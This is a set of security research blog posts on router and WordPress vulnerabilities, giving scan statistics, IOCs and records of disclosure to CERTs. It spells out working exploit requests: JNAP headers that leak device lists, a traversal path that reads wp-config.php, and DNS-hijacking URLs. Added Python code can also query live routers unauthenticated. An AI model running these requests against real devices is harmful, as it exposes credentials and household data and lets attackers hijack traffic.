Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw

Our honeypots frequently detect scans targeting various home automation protocol endpoints. Many of these attacks aim to exploit vulnerable consumer routers. Upon further investigation, we’ve discovered a persistent flaw affecting Linksys Smart Wi-Fi routers that allows unauthenticated remote access to sensitive information.

How can the vulnerability be exploited?

    1. Go to the Linksys Smart Wi-Fi router’s public IP address in your web browser
    2. Open the developer console (F12 key) and go to the Network tab
    3. Scroll down to JNAP (there’s multiple) and click to open it
Example vulnerable Linksys Smart Wi-Fi EA7500 (AC1900) router

The leak can also be reproduced directly by sending a JNAP request with the following action header:

X-JNAP-ACTION: http://cisco.com/jnap/devicelist/GetDevices

This sensitive information disclosure vulnerability requires no authentication and can be exploited by a remote attacker with little technical knowledge.

How many Linksys Smart Wi-Fi routers are vulnerable?

Using data provided by BinaryEdge, our scans have found 25,617 Linksys Smart Wi-Fi routers are currently leaking sensitive information to the public internet, including:

    • MAC address of every device that’s ever connected to it (full historical record, not just active devices)
    • Device name (such as “TROY-PC” or “Mat’s MacBook Pro”)
    • Operating system (such as “Windows 7” or “Android”)

In some cases additional metadata is logged such as device type, manufacturer, model number, and description – as seen in the example below.

Example metadata leaked by Linksys Smart Wi-Fi routers

Other sensitive information about the router such as the WAN settings, firewall status, firmware update settings, and DDNS settings are also leaked publicly.

What are the risks of leaking this information publicly?

A MAC address is a unique identifier for every networked device. Mobile devices, such as smartphones and laptops, share this identifier every time they connect to a wireless network. This creates a fingerprint that can be used to track that device’s movement across networks.

If a device’s name includes the full name of the owner, this flaw allows attackers to determine the identity of the owner and geolocate them via the Linksys Smart Wi-Fi router’s public IP address.

While geolocation by IP address is not precise, services like WiGLE allow anyone to get the geographical coordinates of a WiFi network based solely on its MAC address or SSID. An attacker can query the target Linksys Smart Wi-Fi router, get its MAC address, and immediately geolocate it.

In any scenario, publicly leaking the historical record of every device that’s ever connected to the Linksys Smart Wi-Fi router is a privacy concern that shouldn’t be taken lightly. This information allows attackers to gain visibility inside your home or business network, enabling them to conduct targeted attacks.

Is there any connection to the ShadowHammer attacks?

Of the 756,565 unique MAC addresses currently being leaked, only two were referenced in the ShadowHammer attacks. However, it’s not likely either were targeted directly. The first match, 0c:5b:8f:27:9a:64, appears to be frequently reused by Huawei. The second was the VMware default (00:50:56:c0:00:08) and was targeted only if it paired with a secondary MAC address.

Did you find the German mail bomber?

The MAC address used by the German mail bomber (f8:e0:79:af:57:eb) was not found.

What is Home Network Administration Protocol (HNAP)?

HNAP is a SOAP-based protocol used to manage and configure consumer routers. Cisco acquired and took over development of the protocol in 2009. Numerous HNAP-related vulnerabilities have been identified in the last six years. Large-scale exploitation of HNAP flaws by “TheMoon” botnet was discovered by security researchers in 2014.

Are there other HNAP vulnerabilities?

Yes, an unauthenticated attacker can quickly enumerate which Linksys Smart Wi-Fi routers have not changed the default password (admin) without even attempting to log in to the device. This can be done by simply querying the following JNAP action:

X-JNAP-ACTION: http://cisco.com/jnap/core/IsAdminPasswordDefault

Our scans have found thousands of routers are still using the default password and are vulnerable to immediate takeover – if they aren’t already compromised.
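The two unauthenticated JNAP actions above (GetDevices and IsAdminPasswordDefault) can be checked with a few lines of Python. This is an added example, not code from the original post: the transport it assumes (an HTTP POST to /JNAP/ carrying an X-JNAP-ACTION header and an empty JSON object as body) and the response field names (devices, friendlyName, knownMACAddresses, unit.operatingSystem, model.*, isAdminPasswordDefault) are modelled on public JNAP write-ups and are assumptions; the sample replies embedded below are constructed, not captured from a router.

```python
"""Added example: query and parse the two unauthenticated JNAP actions.

Assumptions (not stated in the post): JNAP is reached via POST /JNAP/ with an
X-JNAP-ACTION header and a JSON body; the response field names below follow
public JNAP write-ups. SAMPLE_* replies are constructed for offline use.
"""
import http.client
import json

JNAP_GET_DEVICES = "http://cisco.com/jnap/devicelist/GetDevices"
JNAP_IS_DEFAULT_PW = "http://cisco.com/jnap/core/IsAdminPasswordDefault"


def build_jnap_request(action):
    """Return (path, headers, body) for one JNAP action (transport assumed)."""
    headers = {
        "X-JNAP-ACTION": action,
        "Content-Type": "application/json; charset=UTF-8",
    }
    return "/JNAP/", headers, b"{}"


def query(host, action, timeout=5):
    """Send one JNAP action to a live router and decode the JSON reply (network call).

    http.client is used instead of urllib so the header name is sent exactly
    as written; some embedded web servers match header names case-sensitively.
    """
    path, headers, body = build_jnap_request(action)
    conn = http.client.HTTPConnection(host, timeout=timeout)
    try:
        conn.request("POST", path, body=body, headers=headers)
        return json.load(conn.getresponse())
    finally:
        conn.close()


def parse_devices(response):
    """Flatten a GetDevices reply into one dict per device (name, MACs, OS, model)."""
    if response.get("result") != "OK":
        return []
    devices = []
    for dev in response.get("output", {}).get("devices", []):
        model = dev.get("model", {})
        devices.append({
            "name": dev.get("friendlyName", ""),
            "macs": list(dev.get("knownMACAddresses", [])),
            "os": dev.get("unit", {}).get("operatingSystem", ""),
            "device_type": model.get("deviceType", ""),
            "manufacturer": model.get("manufacturer", ""),
            "model_number": model.get("modelNumber", ""),
            "description": model.get("description", ""),
        })
    return devices


def is_default_admin_password(response):
    """True/False from an IsAdminPasswordDefault reply; None if the action failed."""
    if response.get("result") != "OK":
        return None
    return bool(response.get("output", {}).get("isAdminPasswordDefault"))


# Constructed sample replies (field names assumed, values invented).
SAMPLE_GET_DEVICES = {
    "result": "OK",
    "output": {"devices": [
        {"friendlyName": "TROY-PC",
         "knownMACAddresses": ["00:11:22:33:44:55"],
         "unit": {"operatingSystem": "Windows 7"},
         "model": {"deviceType": "Computer", "manufacturer": "Dell",
                   "modelNumber": "XPS 13", "description": "Laptop"}},
        {"friendlyName": "Mat's MacBook Pro",
         "knownMACAddresses": ["66:77:88:99:aa:bb", "66:77:88:99:aa:bc"],
         "unit": {"operatingSystem": "macOS"},
         "model": {}},
    ]},
}
SAMPLE_IS_DEFAULT = {"result": "OK", "output": {"isAdminPasswordDefault": True}}

if __name__ == "__main__":
    for device in parse_devices(SAMPLE_GET_DEVICES):
        print(device)
    print("default admin password:", is_default_admin_password(SAMPLE_IS_DEFAULT))
    # Against a live router (own lab device only): query("192.0.2.1", JNAP_GET_DEVICES)
```

The historical record the post describes is exactly what `knownMACAddresses` carries per device, which is why a single unauthenticated action yields more than the current client list; `is_default_admin_password` returning `None` distinguishes a refused or unsupported action from a router that actually answered `False`.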

Admin access to the Linksys Smart Wi-Fi router allows attackers to:

    • Obtain the SSID and Wi-Fi password in plaintext
    • Change the DNS settings to use a rogue DNS server to hijack web traffic
    • Open ports in the router’s firewall to directly target devices behind the routers (example: 3389/tcp for Windows RDP)
    • Use UPnP to redirect outgoing traffic to the threat actors’ device
    • Create an OpenVPN account (supported models) to route malicious traffic through the router
    • Disable the router’s internet connection or modify other settings in a destructive manner

What specific models of Linksys Smart Wi-Fi routers are vulnerable?

Our research has found the models listed below are actively leaking sensitive information, including those running the latest firmware available from Linksys.

Vulnerable Linksys Smart Wi-Fi router model numbers

The full list of vulnerable models and firmware versions is available here.

Where are the vulnerable routers located?

This interactive map shows the total vulnerable Linksys Smart Wi-Fi routers found per country.

Vulnerable Linksys Smart Wi-Fi routers by country
Of the vulnerable routers found, most were located in the United States.

Overall, a grand total of 25,617 vulnerable routers were found in 146 countries and on the network of 1,998 unique autonomous systems (internet service providers).

Wasn’t this issue patched five years ago?

While CVE-2014-8244 was supposedly patched for this issue, our findings have indicated otherwise. Upon contacting the Linksys security team (security@linksys.com) we were advised to report the vulnerability via this form. After submitting our findings, the reviewing analyst determined the issue was “Not applicable / Won’t fix” and subsequently closed.

Is there any good news?

Over half of the vulnerable Linksys Smart Wi-Fi routers (14,387) currently have automatic firmware updates enabled. If Linksys eventually patches this vulnerability, these routers will be protected automatically.

Closing remarks

Due to the sensitive nature of this vulnerability, the IP addresses of the affected Linksys Smart Wi-Fi routers will not be published publicly.

Unfortunately, our typical recommendation of keeping your router’s firmware up-to-date is not applicable in this case as no fix is available. Linksys Smart Wi-Fi routers have remote access enabled by default, as it’s required for the Linksys App to function, and cannot be turned off as a workaround. However, most (but not all) models have the option of using third-party firmware, such as OpenWrt, that can disable remote access and prevent the leak of sensitive information.

Follow us on Twitter for latest emerging threats and botnet trends.

Defunct WordPress plugin leaves nearly 400 websites vulnerable to sensitive information disclosure

On Saturday, April 13, 2019, our honeypots detected an exploit attempt targeting WordPress sites with a defunct plugin, CodeArt – Google MP3 Player, installed. This malicious activity originated from a host on the network of LeaseWeb (AS60781) and exploited a directory traversal flaw to retrieve the wp-config.php settings file. Our scans have indicated 391 WordPress sites are using the vulnerable plugin and are open to this type of attack.

The Exploit Attempt

Attackers leveraged a directory traversal flaw to download the wp-config.php file.

The wp-config.php file contains sensitive information such as the WordPress database name, username, password and hostname.

Example wp-config.php file

This file also contains the WordPress secret keys which can be used to forge authentication cookies. However, access to the WordPress database alone is enough for a threat actor to leverage further attacks to compromise the site. If the database password is the same as the admin user’s password (credential reuse), it could be used to take over the targeted site via the front-end.

In short, there’s plenty of damage that can be incurred against a targeted site with the information contained in the wp-config.php file.

Vulnerable Sites Found

Using data provided by PublicWWW, we’ve scanned 964 WordPress sites currently using the “CodeArt – Google MP3 Player” plugin. Our scans found 391 sites are vulnerable.

The top three hosting providers of vulnerable sites are GoDaddy, Unified Layer, and OVH.


188 of the vulnerable sites found are hosted in the United States.

Click here to view an interactive map of the results

IOCs

212.32.245.142
/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
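The request path above is easy to match literally, but attackers routinely URL-encode or double-encode the `../` segments. The following added example (not code from the original post) scans Apache combined-format access-log lines for requests to the plugin's direct_download.php whose decoded `file` parameter resolves outside the plugin directory. The attacker IP and path are the IOCs from this post; the log lines, timestamps, user agent and the assumed plugin directory /var/www/html/wp-content/plugins/google-mp3-audio-player are constructed.

```python
"""Added example: detect directory-traversal downloads via direct_download.php
in web server access logs. Log lines and the install path are constructed;
the IOC IP and request path come from the post.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

VULN_SCRIPT = "/wp-content/plugins/google-mp3-audio-player/direct_download.php"
PLUGIN_DIR = "/var/www/html/wp-content/plugins/google-mp3-audio-player"  # assumed install path


def decode_fully(value, rounds=3):
    """Strip up to `rounds` layers of URL encoding so %252e%252e%252f becomes '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_target(request_path):
    """Return the file a request would read if it escapes PLUGIN_DIR, else None.

    The `file` parameter is fully decoded, backslashes are normalised to '/',
    and the result is resolved against PLUGIN_DIR; anything that lands outside
    that directory is a traversal attempt.
    """
    parts = urlsplit(request_path)
    if decode_fully(parts.path) != VULN_SCRIPT:
        return None
    file_param = parse_qs(parts.query).get("file", [None])[0]
    if file_param is None:
        return None
    file_param = decode_fully(file_param).replace("\\", "/")
    resolved = posixpath.normpath(posixpath.join(PLUGIN_DIR, file_param))
    if not resolved.startswith(PLUGIN_DIR + "/"):
        return resolved
    return None


def scan_log(lines):
    """Return (ip, time, resolved_target) for each traversal attempt found in `lines`."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = traversal_target(m.group("path"))
        if target is not None:
            hits.append((m.group("ip"), m.group("time"), target))
    return hits


# Constructed sample log: IOC IP/path from the post, everything else invented.
SAMPLE_LOG = [
    '212.32.245.142 - - [13/Apr/2019:10:15:02 +0000] "GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '212.32.245.142 - - [13/Apr/2019:10:15:03 +0000] "GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%252f..%252f..%252fwp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Apr/2019:10:16:40 +0000] "GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=audio/track01.mp3 HTTP/1.1" 200 51200 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [13/Apr/2019:10:17:00 +0000] "GET /index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when, target in scan_log(SAMPLE_LOG):
        print(f"{when} {ip} read {target}")
```

Resolving the decoded parameter against the plugin directory, rather than grepping for `..`, also catches absolute paths and mixed encodings, and the resolved target tells the responder which file was actually read (here wp-config.php, hence the advice to rotate database and user credentials).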

Closing remarks

Due to the sensitive nature of this vulnerability, the list of vulnerable websites will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with MS-ISAC and affected government organizations, such as the Government of Los Angeles County.

The “CodeArt – Google MP3 Player” WordPress plugin is no longer maintained by developers and was last updated six years ago. Anyone still using this plugin is advised to remove it immediately and change their WordPress database and user passwords.

Update 2019-04-18:

Our honeypots have detected additional directory traversal attacks against vulnerable WordPress sites, including those using the plugin described in this post.

Ongoing DNS hijacking campaign targeting consumer routers

Over the last three months, our honeypots have detected DNS hijacking attacks targeting various types of consumer routers. All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169). In this campaign, we’ve identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.

First wave – December 29, 2018

The first DNS hijacking exploit attempts targeted multiple models of D-Link DSL modems, including:

The IP address of rogue DNS server used in this attack was 66.70.173.48 and hosted by OVH Canada.

Second wave – February 6, 2019

This wave targeted the same types of D-Link modems listed above. The rogue DNS server, 144.217.191.145, was again hosted by OVH Canada.

As Twitter user “parseword” noted, the majority of the DNS requests were being redirected to two IPs allocated to a crime-friendly hosting provider (AS206349) and another pointing to a service that monetizes parked domain names (AS395082).

Third wave – March 26, 2019

The latest wave of attacks came from three distinct Google Cloud Platform hosts and targeted additional types of consumer routers not previously seen, including ARG-W4 ADSL routers, DSLink 260E routers, Secutech routers, and TOTOLINK routers.

DNS hijacking exploit attempts

The rogue DNS servers used in this round, 195.128.126.165 and 195.128.124.131, are both hosted in Russia by Inoventica Services. Internet access is provided by their subsidiary Garant-Park-Internet Ltd (AS47196).

Example compromised D-Link DSL-2640B router with DNS servers set to the rogue DNS servers used in this campaign.

In all three waves, a recon scan was done using Masscan to check for active hosts on port 81/tcp prior to attempting the DNS hijacking exploits.

How many targeted devices are vulnerable?

Establishing a definitive total of vulnerable devices would require us to employ the same tactics used by the threat actors in this campaign, which obviously won’t be done. However, we can catalog how many are exposing at least one service to the public internet via data provided by BinaryEdge:

D-Link DSL-2640B – 14,327
D-Link DSL-2740R – 379
D-Link DSL-2780B – 0
D-Link DSL-526B – 7
ARG-W4 ADSL routers – 0
DSLink 260E routers – 7
Secutech routers – 17
TOTOLINK routers – 2,265

Why are DNS hijacking attacks conducted?

As we saw in years past with DNSChanger malware raking in $14 million, advertising-related fraud is still very lucrative for cybercriminals. Other researchers have noted domain parking remains a booming business often tied to illicit activities.

DNS hijacking is also used for phishing attacks which are largely transparent to users. In this case, the domain name of the targeted site is redirected by the rogue DNS server to a web server controlled by the threat actor. A recent DNS hijacking campaign targeting Brazilian banks was documented by Radware researchers.

Why was Google Cloud Platform used?

Being a large cloud service provider, dealing with abuse is an ongoing process for Google. However, unlike its competitors, Google makes it very easy for miscreants to abuse its platform.

Anyone with a Google account can access a “Google Cloud Shell” machine by simply visiting this URL. This service provides users with the equivalent of a Linux VPS with root privileges directly in a web browser. Due to the ephemeral nature of these virtual machines coupled with Google’s slow response time to abuse reports, it’s difficult to prevent this kind of malicious behavior.

IOCs

Exploit Attempt Source IPs
35.190.238.77
35.221.201.149
35.229.230.36
35.221.98.121
35.235.106.76
35.240.128.42
35.190.195.236

Rogue DNS Servers
66.70.173.48
144.217.191.145
195.128.126.165
195.128.124.131

Exploit Attempts
/action?dns_status=1&dns_poll_timeout=2&id=57&dns_server_ip_1=195&dns_server_ip_2=128&dns_server_ip_3=126&dns_server_ip_4=165&priority=1&cmdadd=add
/boafrm/formbasetcpipsetup?dnsmode=dnsmanual&dns1=195.128.126.165&dns2=195.128.124.131&dns3=195.128.124.131&dnsrefresh=1
/dnscfg.cgi?dnsPrimary=195.128.126.165&dnsSecondary=195.128.124.131&dnsDynamic=0&dnsRefresh=1
/form2dns.cgi?dnsmode=1&dns1=195.128.126.165&dns2=195.128.124.131&dns3=&submit.htm?dns.htm=send&save=apply
/wan_dns.asp?go=wan_dns.asp&reboottag=&dsen=1&dnsen=on&ds1=195.128.126.165&ds2=195.128.124.131
/dnscfg.cgi?dnsPrimary=144.217.191.145&dnsSecondary=144.217.191.145&dnsDynamic=0&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=66.70.173.48&dnsSecondary=66.70.173.48&dnsDynamic=0&dnsRefresh=1
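Each router family above takes its resolver settings through a different parameter scheme, and one of them (the /action?dns_server_ip_1..4 variant) splits the address into four octets. The added example below (not code from the original post) extracts the DNS servers a request would push to the router and checks them against the rogue resolvers listed in this post, so honeypot or proxy logs can be triaged without a per-model signature. The exploit paths are copied from the IOCs above; the allow-list used in the usage call is constructed.

```python
"""Added example: recover the resolver IPs from DNS-hijack exploit requests and
match them against the rogue-DNS IOCs. Request paths are from the post; the
allow-list passed to classify() is a constructed example.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Rogue resolvers named in the post, including the two from the 2019-04-05 update.
ROGUE_DNS = {
    "66.70.173.48", "144.217.191.145",
    "195.128.126.165", "195.128.124.131",
    "195.128.124.150", "195.128.124.181",
}

OCTET_KEY = re.compile(r"^dns_server_ip_([1-4])$")


def extract_dns_servers(request_path):
    """Return the set of resolver IPs a request tries to configure.

    Handles dotted addresses in any dns*/ds* parameter (dns1, dnsPrimary,
    ds1, ...) and the octet-per-parameter form dns_server_ip_1..4.
    """
    params = parse_qsl(urlsplit(request_path).query, keep_blank_values=True)
    found, octets = set(), {}
    for key, value in params:
        m = OCTET_KEY.match(key)
        if m:
            octets[int(m.group(1))] = value
            continue
        if not key.lower().startswith(("dns", "ds")):
            continue
        try:
            found.add(str(ipaddress.ip_address(value)))
        except ValueError:  # flags like dnsmode=1 or empty dns3= are not addresses
            continue
    if len(octets) == 4:
        try:
            found.add(str(ipaddress.ip_address(".".join(octets[i] for i in range(1, 5)))))
        except ValueError:
            pass
    return found


def classify(request_path, allowed=frozenset()):
    """Label a request 'rogue' (known IOC), 'suspicious' (resolver outside the
    allow-list) or 'ok' (no resolver change, or only allowed resolvers)."""
    servers = extract_dns_servers(request_path)
    if servers & ROGUE_DNS:
        return "rogue", servers
    if servers - set(allowed):
        return "suspicious", servers
    return "ok", servers


# Exploit attempts as listed in the post's IOCs.
EXPLOIT_ATTEMPTS = [
    "/action?dns_status=1&dns_poll_timeout=2&id=57&dns_server_ip_1=195&dns_server_ip_2=128&dns_server_ip_3=126&dns_server_ip_4=165&priority=1&cmdadd=add",
    "/boafrm/formbasetcpipsetup?dnsmode=dnsmanual&dns1=195.128.126.165&dns2=195.128.124.131&dns3=195.128.124.131&dnsrefresh=1",
    "/dnscfg.cgi?dnsPrimary=195.128.126.165&dnsSecondary=195.128.124.131&dnsDynamic=0&dnsRefresh=1",
    "/form2dns.cgi?dnsmode=1&dns1=195.128.126.165&dns2=195.128.124.131&dns3=&submit.htm?dns.htm=send&save=apply",
    "/wan_dns.asp?go=wan_dns.asp&reboottag=&dsen=1&dnsen=on&ds1=195.128.126.165&ds2=195.128.124.131",
    "/dnscfg.cgi?dnsPrimary=144.217.191.145&dnsSecondary=144.217.191.145&dnsDynamic=0&dnsRefresh=1",
    "/dnscfg.cgi?dnsPrimary=66.70.173.48&dnsSecondary=66.70.173.48&dnsDynamic=0&dnsRefresh=1",
]

if __name__ == "__main__":
    isp_resolvers = {"1.1.1.1", "8.8.8.8"}  # constructed allow-list
    for path in EXPLOIT_ATTEMPTS:
        print(classify(path, isp_resolvers), path.split("?")[0])
```

Treating the resolver address as the signal, rather than the path, is what makes this survive new router families: the fourth to seventh waves noted in the updates below reuse the same resolvers regardless of which CGI the exploit hits.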

Closing Remarks

In general, we recommend users to keep their home router firmware up-to-date. When security vulnerabilities are discovered, they are usually patched by the manufacturer to mitigate further attacks. It’s also advisable to review your router’s DNS settings to ensure they haven’t been tampered with. Typically your DNS servers should be set to the ones provided by your ISP or well-known public DNS resolvers.

As always, follow us on Twitter for latest emerging threats and botnet trends.

Update 2019-04-05:

Ixia researchers posted their findings on the DNS hijacking attacks originating from Google Cloud Platform. They found sites targeted for phishing included Netflix, PayPal, Uber, Gmail, and more.

They’ve also identified additional rogue DNS servers, again hosted by Inoventica Services in Russia:
195.128.124.150
195.128.124.181

A Google spokesperson provided the following statement to Ars Technica in regards to the abuse of Google Cloud Platform to conduct the DNS hijacking attacks:

Google response to abuse of their platform

Update 2019-04-23:

Our honeypots have detected a fourth wave of DNS hijacking attacks, again coming from a Google Cloud Platform host.

Update 2019-04-26:

Our honeypots have detected a fifth wave of DNS hijacking attacks, yet again originating from a Google Cloud Platform host.

Update 2019-04-28:

Our honeypots have detected a sixth wave of DNS hijacking exploit attempts, originating from a Google Cloud Platform host.

Update 2019-04-30:

Our honeypots have detected a seventh wave of DNS hijacking exploit attempts, originating from a Google Cloud Platform host.

Over 9,000 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653

On Friday, January 25, 2019, our honeypots detected opportunistic scanning activity from multiple hosts targeting Cisco Small Business RV320 and RV325 routers. A vulnerability exists in these routers that allows remote unauthenticated information disclosure (CVE-2019-1653), leading to remote code execution (CVE-2019-1652).

These scans consisted of a GET request for /cgi-bin/config.exp which is the path that allows unauthenticated remote users to obtain an entire dump of the device’s configuration settings. This includes the administrator credentials, however the password is hashed.

All configuration settings of the RV320/RV325 routers are exposed by this vulnerability.

Using data provided by BinaryEdge, we’ve scanned 15,309 unique IPv4 hosts and determined 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653.

  • 6,247 out of 9,852 Cisco RV320 routers scanned are vulnerable
    (1,650 are not vulnerable and 1,955 did not respond to our scans)
  • 3,410 out of 5,457 Cisco RV325 routers scanned are vulnerable
    (1,027 are not vulnerable and 1,020 did not respond to our scans)
Of the vulnerable routers found, most were located in the United States.

This interactive map shows the total vulnerable hosts found per country. Overall, vulnerable devices were found in 122 countries and on the network of 1,619 unique internet service providers (autonomous systems).

These routers can be exploited further using the leaked credentials (CVE-2019-1652) resulting in remote code execution detailed in the proof-of-concept published by David Davidson (0x27).

These vulnerabilities affect Cisco RV320/RV325 routers running firmware releases 1.4.2.15 and 1.4.2.17. Cisco has released a patch for these routers that should be applied immediately by anyone using outdated firmware. Changing the device’s admin and WiFi credentials is also highly recommended as they may already be compromised. Cisco has published an advisory providing further details here.

Closing remarks

Due to the sensitive nature of these vulnerabilities, the IP addresses of the affected Cisco RV320/RV325 routers will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with Cisco PSIRT and US-CERT for further investigation and remediation.

Additional updates

Update 2019-01-27:
We’ve shared our findings with CIRCL and SingCERT regarding vulnerable routers in Luxembourg and Singapore, respectively.

Update 2019-01-28:
We’ve shared our findings with ACSC, the Canadian Centre for Cyber Security, CCB, CERT.at, CLCERT, NCSC and Z-CERT.

Update 2019-01-29:
We’ve shared our findings with ANSSI/COSSI/CERT-FR, CSIRT-IE, CERT-PT, and SK-CERT.

Update 2019-01-30:
Cisco PSIRT confirmed receipt of our report of vulnerable Cisco RV320/RV325 routers. We’ve also shared our findings with INCIBE-CERT.

Our honeypots detected incoming scans from new unique hosts checking for vulnerable Cisco RV320/RV325 routers.

Update 2019-01-31:
US-CERT / CISA confirmed receipt of our report and advised their Technical Analysis Branch is reviewing.

Update 2019-02-01:
We’ve shared our findings with CERT Polska.

Our honeypots detected incoming scans from a new unique host checking for Cisco RV320/RV325 routers vulnerable to CVE-2019-1653.

Update 2019-03-27:

In a disclosure posted today, RedTeam Pentesting revealed that the firmware update released by Cisco for affected RV320/RV325 routers did not properly correct the vulnerability.

Patched devices may still be vulnerable to unauthorized information disclosure if the user agent used by the attacker is anything other than curl.
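A fix that keys on the client's User-Agent is a blocklist on an attacker-controlled header, so anything that is not the blocked string still gets the export. The added example below (not Cisco's firmware code, nor code from the original post) models that flawed check beside the correct one and includes the probe a scanner would use to confirm whether a "patched" device still leaks; the request/handler shapes and the config placeholder are invented for illustration, only the behaviour described above is taken from the post.

```python
"""Added example: a User-Agent blocklist (the failure mode described above)
beside an authentication check, plus a probe that shows which one still leaks.
Handler signatures and CONFIG_DUMP are invented for illustration.
"""

CONFIG_DUMP = "admin:HASHED_PASSWORD_PLACEHOLDER\nwan_ip=203.0.113.5\n"  # constructed stand-in

PROBE_AGENTS = ["curl/7.64.0", "Mozilla/5.0", "python-requests/2.21"]


def export_config_flawed(headers, authenticated):
    """Return (status, body). Denies only when the User-Agent mentions curl."""
    user_agent = headers.get("User-Agent", "")
    if "curl" in user_agent.lower():
        return 403, ""
    return 200, CONFIG_DUMP  # unauthenticated clients with any other UA still get it


def export_config_fixed(headers, authenticated):
    """Return (status, body). Gates the export on a validated admin session only."""
    if not authenticated:
        return 401, ""
    return 200, CONFIG_DUMP  # User-Agent is not consulted at all


def still_leaks(handler):
    """Request the export unauthenticated with several User-Agents; list those served."""
    return [ua for ua in PROBE_AGENTS if handler({"User-Agent": ua}, False)[0] == 200]


if __name__ == "__main__":
    print("flawed fix leaks to:", still_leaks(export_config_flawed))
    print("real fix leaks to:  ", still_leaks(export_config_fixed))
```

The probe is also the right regression test for any vendor patch of an unauthenticated disclosure: vary everything the client controls (User-Agent, Referer, path casing, query string) and require that every unauthenticated variant is refused, not just the one the public proof-of-concept used.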

Update 2019-03-28:

Our latest scan results indicate over 8,000 Cisco RV320/RV325 routers are still vulnerable to CVE-2019-1653.

Over 19,000 Orange Livebox ADSL modems are leaking their WiFi credentials

On Friday, December 21, 2018, our honeypots observed an interesting scan consisting of a GET request for /get_getnetworkconf.cgi. Upon further investigation, we found this traffic was targeting Orange Livebox ADSL modems. A flaw exists in these modems that allows remote unauthenticated users to obtain the device’s SSID and WiFi password.

A simple GET request to “/get_getnetworkconf.cgi” will reveal the Orange Livebox modem’s WiFi credentials in plaintext.

To assess the amount of devices vulnerable to this flaw, we obtained a list of Orange Livebox modems from Shodan.

Of the 30,063 IPv4 hosts found, our scans revealed:

  • 19,490 leaking their WiFi credentials (SSID/password) in plaintext
  • 2,018 not leaking any information, but still exposed to the internet
  • 8,391 not responding to our scans

Many of the devices found to be leaking their WiFi password use the same password to administer the device (password reuse) or have not configured any custom password – so the factory default “admin/admin” credentials are still applied.

Example Livebox modem status page: poorly secured Livebox modems enable remote users to view the customer’s phone number, the name/MAC address of all connected clients, and more.

This allows any remote user to easily access the device and maliciously modify its settings or firmware. In addition, they can obtain the phone number tied to the modem and conduct other serious exploits detailed in this Github repository.

Unsurprisingly, the vast majority of affected devices were found to be on the network of Orange Espana (AS12479).

Total affected Livebox modems

Initial scan source


The initial scan detected by our honeypots came from 81.38.86.204 which is an IP address associated to a Telefonica Spain customer. While we can only guess what the motive was behind these scans, it’s interesting to find the source is physically closer to the affected Livebox ADSL modems than say a threat actor in another country. This could allow them to connect to the WiFi network (SSID) if they were near one of the modems indexed by their scans.

Closing remarks

Due to the sensitive nature of this flaw, the IP addresses of affected Orange Livebox ADSL modems will not be published publicly; however, the list is freely available for law enforcement and CERT teams to review. We’ve shared our findings directly with Orange Espana, Orange-CERT, and CCN-CERT for further investigation and remediation.

Update 4:00 AM PT: Orange-CERT has acknowledged our report and is investigating further.

Update 6:00 PM PT: CVE-2018-20377 has been assigned for the flaw described in this post.

Update 2018-12-25: These Orange Livebox Arcadyan ARV7519 modem firmware versions appear to be patched against the “/get_getnetworkconf.cgi” flaw that leaks WiFi credentials:

  • 00.96.00.96.713D
  • 00.96.00.96.613E
  • 00.96.807
  • 00.96.322

These versions are not patched and remain vulnerable to CVE-2018-20377:

  • 00.96.00.96.613
  • 00.96.00.96.609ES
  • 00.96.321S
  • 00.96.217

Update 2018-12-29: Nearly 15,000 Orange Livebox Arcadyan ARV7519 modems have been patched against CVE-2018-20377.